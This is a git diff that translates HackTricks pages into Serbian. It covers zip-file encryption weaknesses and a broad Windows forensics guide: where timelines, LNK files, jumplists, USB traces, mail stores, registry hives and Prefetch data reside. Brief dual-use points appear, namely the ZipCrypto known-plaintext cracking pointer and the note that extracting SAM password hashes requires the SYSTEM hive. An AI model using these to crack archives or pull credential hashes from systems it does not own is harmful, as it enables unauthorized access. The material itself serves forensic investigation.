-The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.
+[Specifikacija formata zip datoteka](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip datoteka.
 
-It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
+Važno je napomenuti da zip datoteke zaštićene lozinkom **ne enkriptuju imena datoteka ili veličine datoteka** unutar, što je sigurnosni propust koji RAR ili 7z datoteke ne dele, jer enkriptuju te informacije. Pored toga, zip datoteke enkriptovane starijom metodom ZipCrypto su podložne **napadu u običnom tekstu** ako je dostupna neenkriptovana kopija kompresovane datoteke. Ovaj napad koristi poznati sadržaj za probijanje zip lozinke, ranjivost detaljno objašnjenu u [HackThis članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dodatno objašnjenu u [ovoj akademskoj studiji](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Međutim, zip datoteke zaštićene **AES-256** enkripcijom su imune na ovaj napad u običnom tekstu, što pokazuje važnost izbora sigurnih metoda enkripcije za osetljive podatke.
 
-## References
+## Reference
 
 - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
index bf7543e9b..26ba08e9b 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
@@ -1,270 +1,266 @@
-# Windows Artifacts
+# Windows artefakti
 
-## Windows Artifacts
+## Windows artefakti
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Generic Windows Artifacts
+## Opšti Windows artefakti
 
-### Windows 10 Notifications
+### Windows 10 obaveštenja
 
-In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
+U putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows godišnjice) ili `wpndatabase.db` (posle Windows godišnjice).
 
-Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data.
+Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koja mogu sadržati zanimljive podatke.
 
-### Timeline
+### Hronologija
 
-Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications.
+Hronologija je karakteristika Windows-a koja pruža **hronološku istoriju** web stranica koje su posećene, uređivanih dokumenata i izvršenih aplikacija.
 
-The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
+Baza podataka se nalazi u putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ova baza podataka može se otvoriti sa SQLite alatom ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
 
-### ADS (Alternate Data Streams)
+### ADS (Alternativni tokovi podataka)
 
-Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded.
+Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je **preuzeta** sa intraneta, interneta itd. Neki softver (poput pregledača) obično dodaje čak i **više** **informacija** poput **URL-a** sa kojeg je datoteka preuzeta.
 
-## **File Backups**
+## **Backup datoteka**
 
-### Recycle Bin
+### Korpa za otpatke
 
-In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\
-When a file is deleted in this folder 2 specific files are created:
+U Vista/Win7/Win8/Win10 **Korpa za otpatke** može se pronaći u fascikli **`$Recycle.bin`** u korenu diska (`C:\$Recycle.bin`).\
+Kada se datoteka obriše u ovoj fascikli, kreiraju se 2 specifične datoteke:
 
-- `$I{id}`: File information (date of when it was deleted}
-- `$R{id}`: Content of the file
+- `$I{id}`: Informacije o datoteci (datum kada je obrisana)
+- `$R{id}`: Sadržaj datoteke
 
 ![](<../../../images/image (1029).png>)
 
-Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
-
+Imajući ove datoteke, možete koristiti alat [**Rifiuti**](https://github.com/abelcheung/rifiuti2) da dobijete originalnu adresu obrisanih datoteka i datum kada je obrisana (koristite `rifiuti-vista.exe` za Vista – Win10).
 ```
 .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
 ```
-
 ![](<../../../images/image (495) (1) (1) (1).png>)
 
 ### Volume Shadow Copies
 
-Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
+Shadow Copy je tehnologija uključena u Microsoft Windows koja može da kreira **rezervne kopije** ili snimke računarskih datoteka ili volumena, čak i kada su u upotrebi.
 
-These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
+Ove rezervne kopije se obično nalaze u `\System Volume Information` iz korena fajl sistema, a ime se sastoji od **UID-ova** prikazanih na sledećoj slici:
 
 ![](<../../../images/image (94).png>)
 
-Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
+Montiranjem forenzičke slike sa **ArsenalImageMounter**, alat [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) može se koristiti za inspekciju shadow copy-a i čak **ekstrakciju datoteka** iz rezervnih kopija shadow copy-a.
 
 ![](<../../../images/image (576).png>)
 
-The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
+Registri unos `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` sadrži datoteke i ključeve **koje ne treba rezervisati**:
 
 ![](<../../../images/image (254).png>)
 
-The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
+Registri `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`.
 
 ### Office AutoSaved Files
 
-You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
+Možete pronaći automatski sačuvane datoteke u: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
 
 ## Shell Items
 
-A shell item is an item that contains information about how to access another file.
+Shell item je stavka koja sadrži informacije o tome kako pristupiti drugoj datoteci.
 
 ### Recent Documents (LNK)
 
-Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
+Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koristi ili kreira datoteku** u:
 
 - Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
 - Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
 
-When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
+Kada se kreira folder, takođe se kreira veza do foldera, do roditeljskog foldera i do foldera bake.
 
-These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
+Ove automatski kreirane link datoteke **sadrže informacije o poreklu** kao što su da li je to **datoteka** **ili** **folder**, **MAC** **vremena** te datoteke, **informacije o volumenu** gde je datoteka smeštena i **folder ciljne datoteke**. Ove informacije mogu biti korisne za oporavak tih datoteka u slučaju da su uklonjene.
 
-Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
+Takođe, **datum kreiranja link** datoteke je prvi **put** kada je originalna datoteka **prvi put** **korisćena**, a **datum** **modifikacije** link datoteke je **poslednji** **put** kada je izvorna datoteka korišćena.
 
-To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
+Da biste inspektovali ove datoteke, možete koristiti [**LinkParser**](http://4discovery.com/our-tools/).
 
-In this tools you will find **2 sets** of timestamps:
+U ovom alatu ćete pronaći **2 skupa** vremenskih oznaka:
 
-- **First Set:**
-  1. FileModifiedDate
-  2. FileAccessDate
-  3. FileCreationDate
-- **Second Set:**
-  1. LinkModifiedDate
-  2. LinkAccessDate
-  3. LinkCreationDate.
+- **Prvi skup:**
+1. FileModifiedDate
+2. FileAccessDate
+3. FileCreationDate
+- **Drugi skup:**
+1. LinkModifiedDate
+2. LinkAccessDate
+3. LinkCreationDate.
 
-The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
-
-You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
+Prvi skup vremenskih oznaka se odnosi na **vremenske oznake same datoteke**. Drugi skup se odnosi na **vremenske oznake povezane datoteke**.
 
+Možete dobiti iste informacije pokretanjem Windows CLI alata: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
 ```
 LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
 ```
-
-In this case, the information is going to be saved inside a CSV file.
+U ovom slučaju, informacije će biti sačuvane unutar CSV datoteke.
 
 ### Jumplists
 
-These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
+Ovo su nedavne datoteke koje su označene po aplikaciji. To je lista **nedavnih datoteka korišćenih od strane aplikacije** kojima možete pristupiti u svakoj aplikaciji. Mogu biti kreirane **automatski ili po meri**.
 
-The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
+**Jumplists** kreirane automatski se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists su imenovane prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije.
 
-The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
+Prilagođeni jumplists se čuvaju u `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto **važnog** dogodilo sa datotekom (možda označeno kao omiljeno).
 
-The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**.
+**Vreme kreiranja** bilo kog jumplista označava **prvi put kada je datoteka pristupljena** i **vreme modifikacije poslednji put**.
 
-You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
+Možete pregledati jumplists koristeći [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
 
 ![](<../../../images/image (168).png>)
 
-(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
+(_Napomena da su vremenski oznake koje pruža JumplistExplorer povezane sa samom jumplist datotekom_)
 
 ### Shellbags
 
-[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
+[**Pratite ovaj link da saznate šta su shellbags.**](interesting-windows-registry-keys.md#shellbags)
 
-## Use of Windows USBs
+## Korišćenje Windows USB-a
 
-It's possible to identify that a USB device was used thanks to the creation of:
+Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju:
 
 - Windows Recent Folder
 - Microsoft Office Recent Folder
 - Jumplists
 
-Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
+Napomena da neka LNK datoteka umesto da pokazuje na originalni put, pokazuje na WPDNSE folder:
 
 ![](<../../../images/image (218).png>)
 
-The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
+Datoteke u WPDNSE folderu su kopije originalnih, stoga neće preživeti restart PC-a i GUID se uzima iz shellbaga.
 
 ### Registry Information
 
-[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices.
+[Proverite ovu stranicu da saznate](interesting-windows-registry-keys.md#usb-information) koji registry ključevi sadrže zanimljive informacije o USB povezanim uređajima.
 
 ### setupapi
 
-Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
+Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da dobijete vremenske oznake kada je USB konekcija ostvarena (potražite `Section start`).
 
-![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
+![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
 
 ### USB Detective
 
-[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
+[**USBDetective**](https://usbdetective.com) može se koristiti za dobijanje informacija o USB uređajima koji su povezani sa slikom.
 
 ![](<../../../images/image (452).png>)
 
 ### Plug and Play Cleanup
 
-The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
+Zakazana aktivnost poznata kao 'Plug and Play Cleanup' prvenstveno je dizajnirana za uklanjanje zastarelih verzija drajvera. Suprotno njenoj specificiranoj svrsi zadržavanja najnovije verzije paketa drajvera, online izvori sugerišu da takođe cilja drajvere koji su bili neaktivni 30 dana. Kao rezultat, drajveri za uklonjive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju.
 
-The task is located at the following path: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
+Zadatak se nalazi na sledećem putu: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
 
-A screenshot depicting the task's content is provided: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
+Prikazana je slika koja prikazuje sadržaj zadatka: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
 
-**Key Components and Settings of the Task:**
+**Ključne komponente i podešavanja zadatka:**
 
-- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
-- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
+- **pnpclean.dll**: Ova DLL je odgovorna za stvarni proces čišćenja.
+- **UseUnifiedSchedulingEngine**: Podešeno na `TRUE`, što ukazuje na korišćenje generičkog mehanizma za zakazivanje zadataka.
 - **MaintenanceSettings**:
-  - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
-  - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
+- **Period ('P1M')**: Usmerava Task Scheduler da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja.
+- **Deadline ('P2M')**: Upravlja Task Scheduler-om, ako zadatak ne uspe dva uzastopna meseca, da izvrši zadatak tokom hitnog automatskog održavanja.
 
-This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
+Ova konfiguracija osigurava redovno održavanje i čišćenje drajvera, sa odredbama za ponovni pokušaj zadatka u slučaju uzastopnih neuspeha.
 
-**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
+**Za više informacija proverite:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
 
 ## Emails
 
-Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
+Emailovi sadrže **2 zanimljiva dela: zaglavlja i sadržaj** emaila. U **zaglavljima** možete pronaći informacije kao što su:
 
-- **Who** sent the emails (email address, IP, mail servers that have redirected the email)
-- **When** was the email sent
+- **Ko** je poslao emailove (email adresa, IP, mail serveri koji su preusmerili email)
+- **Kada** je email poslat
 
-Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
+Takođe, unutar `References` i `In-Reply-To` zaglavlja možete pronaći ID poruka:
 
 ![](<../../../images/image (593).png>)
 
 ### Windows Mail App
 
-This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
+Ova aplikacija čuva emailove u HTML-u ili tekstu. Možete pronaći emailove unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa `.dat` ekstenzijom.
 
-The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
+**Metapodaci** emailova i **kontakti** mogu se naći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
 
-**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails.
+**Promenite ekstenziju** datoteke sa `.vol` na `.edb` i možete koristiti alat [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) da je otvorite. Unutar `Message` tabele možete videti emailove.
 
 ### Microsoft Outlook
 
-When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
+Kada se koriste Exchange serveri ili Outlook klijenti, biće prisutni neki MAPI zaglavlja:
 
-- `Mapi-Client-Submit-Time`: Time of the system when the email was sent
-- `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread
-- `Mapi-Entry-ID`: Message identifier.
-- `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?)
+- `Mapi-Client-Submit-Time`: Vreme sistema kada je email poslat
+- `Mapi-Conversation-Index`: Broj poruka u thread-u i vremenska oznaka svake poruke u thread-u
+- `Mapi-Entry-ID`: Identifikator poruke.
+- `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nije pročitana? odgovoreno? preusmereno? van kancelarije?)
 
-In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in:
+U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru čuvaju se u PST datoteci u:
 
 - `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
 - `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
 
-The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
+Putanja u registru `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` ukazuje na datoteku koja se koristi.
 
-You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
+Možete otvoriti PST datoteku koristeći alat [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
 
 ![](<../../../images/image (498).png>)
 
 ### Microsoft Outlook OST Files
 
-An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
+**OST datoteka** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST datoteka. Ova datoteka se sinhronizuje sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao PST datoteka. Da biste pregledali OST datoteku, može se koristiti [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html).
 
 ### Retrieving Attachments
 
-Lost attachments might be recoverable from:
+Izgubljeni dodaci mogu se povratiti iz:
 
-- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
-- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
+- Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
+- Za **IE11 i novije**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
 
 ### Thunderbird MBOX Files
 
-**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
+**Thunderbird** koristi **MBOX datoteke** za čuvanje podataka, smeštene u `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
 
 ### Image Thumbnails
 
-- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion.
-- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path.
-- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files.
+- **Windows XP i 8-8.1**: Pristup folderu sa sličicama generiše `thumbs.db` datoteku koja čuva prikaze slika, čak i nakon brisanja.
+- **Windows 7/10**: `thumbs.db` se kreira kada se pristupa preko mreže putem UNC puta.
+- **Windows Vista i novije**: Prikazi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa datotekama imenovanim **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregled ovih datoteka.
 
 ### Windows Registry Information
 
-The Windows Registry, storing extensive system and user activity data, is contained within files in:
+Windows Registry, koji čuva opsežne podatke o sistemu i korisničkim aktivnostima, sadrži se unutar datoteka u:
 
-- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
-- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
-- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`.
-- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards.
+- `%windir%\System32\Config` za razne `HKEY_LOCAL_MACHINE` podključeve.
+- `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`.
+- Windows Vista i novije verzije prave rezervne kopije `HKEY_LOCAL_MACHINE` registry datoteka u `%Windir%\System32\Config\RegBack\`.
+- Pored toga, informacije o izvršenju programa se čuvaju u `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` od Windows Vista i Windows 2008 Server nadalje.
 
 ### Tools
 
-Some tools are useful to analyze the registry files:
+Neki alati su korisni za analizu registry datoteka:
 
-- **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session.
-- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information.
-- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
-- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
+- **Registry Editor**: Instaliran je u Windows-u. To je GUI za navigaciju kroz Windows registry trenutne sesije.
+- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava vam da učitate registry datoteku i navigirate kroz njih sa GUI-jem. Takođe sadrži oznake koje ističu ključeve sa zanimljivim informacijama.
+- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ponovo, ima GUI koji omogućava navigaciju kroz učitani registry i takođe sadrži dodatke koji ističu zanimljive informacije unutar učitanog registry-a.
+- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna GUI aplikacija sposobna da izvuče važne informacije iz učitanog registry-a.
 
 ### Recovering Deleted Element
 
-When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
+Kada je ključ obrisan, označen je kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. Stoga, korišćenjem alata kao što je **Registry Explorer** moguće je povratiti ove obrisane ključeve.
 
 ### Last Write Time
 
-Each Key-Value contains a **timestamp** indicating the last time it was modified.
+Svaki Key-Value sadrži **vremensku oznaku** koja označava poslednji put kada je modifikovan.
 
 ### SAM
 
-The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.
+Datoteka/hive **SAM** sadrži **korisnike, grupe i heširane lozinke korisnika** sistema.
 
-In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**.
+U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednji neuspešni logon, brojač prijava, politiku lozinki i kada je nalog kreiran. Da biste dobili **hešove** takođe **trebate** datoteku/hive **SYSTEM**.
 
 ### Interesting entries in the Windows Registry
 
@@ -276,229 +272,223 @@ interesting-windows-registry-keys.md
 
 ### Basic Windows Processes
 
-In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours.
+U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o uobičajenim Windows procesima za otkrivanje sumnjivih ponašanja.
 
 ### Windows Recent APPs
 
-Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
+Unutar registra `NTUSER.DAT` na putu `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenoj aplikaciji**, **poslednjem putu** kada je izvršena, i **broju puta** kada je pokrenuta.
 
 ### BAM (Background Activity Moderator)
 
-You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
+Možete otvoriti datoteku `SYSTEM` sa registry editorom i unutar puta `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama koje je izvršio svaki korisnik** (napomena na `{SID}` u putu) i **u koje vreme** su izvršene (vreme je unutar Data vrednosti registra).
 
 ### Windows Prefetch
 
-Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker.
+Prefetching je tehnika koja omogućava računaru da tiho **preuzme potrebne resurse potrebne za prikazivanje sadržaja** koji korisnik **može pristupiti u bliskoj budućnosti** kako bi se resursi mogli brže pristupiti.
 
-Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10.
+Windows prefetch se sastoji od kreiranja **kešova izvršenih programa** kako bi ih mogli učitati brže. Ovi keševi se kreiraju kao `.pf` datoteke unutar puta: `C:\Windows\Prefetch`. Postoji limit od 128 datoteka u XP/VISTA/WIN7 i 1024 datoteka u Win8/Win10.
 
-The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point.
+Ime datoteke se kreira kao `{program_name}-{hash}.pf` (heš se zasniva na putu i argumentima izvršnog programa). U W10 ove datoteke su kompresovane. Imajte na umu da sama prisutnost datoteke ukazuje da je **program izvršen** u nekom trenutku.
 
